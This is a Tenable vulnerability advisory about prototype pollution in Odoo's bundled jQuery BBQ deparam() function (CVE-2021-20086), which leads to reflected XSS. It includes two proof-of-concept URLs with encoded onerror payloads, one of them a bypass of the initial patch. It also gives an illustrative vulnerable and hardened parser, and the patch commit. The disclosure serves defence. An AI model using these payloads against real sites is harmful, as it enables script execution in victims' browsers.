Synopsis
A researcher at Tenable discovered a prototype pollution vulnerability in Odoo Apps which can result in reflected cross-site scripting (XSS) in affected applications. The vulnerability exists because Odoo leverages a vulnerable version of JQuery Big Back Button (JQuery BBQ), affected by CVE-2021-20086, which can lead to prototype pollution through the deparam() function. An attacker who convinces a victim to visit a specially crafted link could achieve arbitrary JavaScript execution in the context of the user's browser.
Proof of concept:
In a page which uses the affected deparam() function on unsanitized user input, a reflected XSS payload can be triggered. For example, consider a page which parses the URL parameters like so:
query = $.deparam(window.location.search.slice(1));
The two following URLs would trigger a reflected XSS alert box containing the odoo-app domain name:
# PoC fixed in the initial patch
https://[odoo-app]/affected_page?__proto__%5Bcontext%5D=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&__proto__%5Bjquery%5D=x

# Workaround fixed in final patch
https://[odoo-app]/affected_page?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&constructor%5Bprototype%5D%5Bjquery%5D=x
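The following added example (not jQuery BBQ's source and not Odoo's code) re-creates the nested-key walk that makes a deparam-style parser pollutable, shows why both key shapes in the URLs above reach Object.prototype, and places a hardened parser beside it. The query strings are constructed with a harmless marker value in place of the image payload.

```javascript
// Example code added to illustrate the advisory; it is not jQuery BBQ's source or Odoo's code.
// splitPairs turns "a%5Bb%5D=v&c=w" into [{parts:["a","b"], val:"v"}, {parts:["c"], val:"w"}].
function splitPairs(query) {
  return query.split('&').filter(Boolean).map(pair => {
    const [k, v = ''] = pair.split('=');
    const dec = s => decodeURIComponent(s.replace(/\+/g, ' '));
    // "__proto__[context]" -> ["__proto__", "context"]
    return { parts: dec(k).replace(/\]/g, '').split('['), val: dec(v) };
  });
}

// Vulnerable shape: descends through whatever cur[p] resolves to, including inherited values.
function deparamUnsafe(query) {
  const out = {};
  for (const { parts, val } of splitPairs(query)) {
    let cur = out;
    for (const p of parts.slice(0, -1)) {
      // cur["__proto__"] is Object.prototype and cur["constructor"] is Object, so both
      // "__proto__[context]" and "constructor[prototype][context]" end on Object.prototype.
      cur = cur[p] || (cur[p] = {});
    }
    cur[parts[parts.length - 1]] = val;
  }
  return out;
}

// Hardened shape: drop pairs naming a prototype-reaching segment and only descend into own properties.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function deparamSafe(query) {
  const out = {};
  for (const { parts, val } of splitPairs(query)) {
    if (parts.some(p => FORBIDDEN.has(p))) continue;
    let cur = out;
    for (const p of parts.slice(0, -1)) {
      if (!Object.prototype.hasOwnProperty.call(cur, p) || typeof cur[p] !== 'object') cur[p] = {};
      cur = cur[p];
    }
    cur[parts[parts.length - 1]] = val;
  }
  return out;
}

// Constructed queries with the same key shapes as the advisory's two URLs, carrying a benign marker.
const PROTO_QUERY = '__proto__%5Bcontext%5D=polluted&__proto__%5Bjquery%5D=x';
const CTOR_QUERY = 'constructor%5Bprototype%5D%5Bcontext%5D=polluted&constructor%5Bprototype%5D%5Bjquery%5D=x';

// Parses with the given function, reports whether a fresh unrelated object now inherits "context",
// then removes any pollution so the process is left clean.
function runDemo(parser, query) {
  const result = parser(query);
  const polluted = ({}).context === 'polluted';
  delete Object.prototype.context;
  delete Object.prototype.jquery;
  return { result, polluted };
}
```

Calling runDemo(deparamUnsafe, PROTO_QUERY) or runDemo(deparamUnsafe, CTOR_QUERY) reports pollution, while deparamSafe parses ordinary nested keys normally and leaves Object.prototype untouched for both shapes.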
Solution
Odoo has patched this issue in the following commit: https://github.com/odoo/odoo/commit/4811b8427cc27607f4b196ea40876bf822452d0d
Additional References
https://nvd.nist.gov/vuln/detail/CVE-2021-20086
https://github.com/odoo/odoo/commit/4811b8427cc27607f4b196ea40876bf822452d0d
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]